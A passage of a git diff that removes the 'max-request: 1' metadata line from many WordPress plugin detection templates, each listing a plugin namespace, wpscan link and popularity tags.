-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 9c6e3e6d2e..1778552d75 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
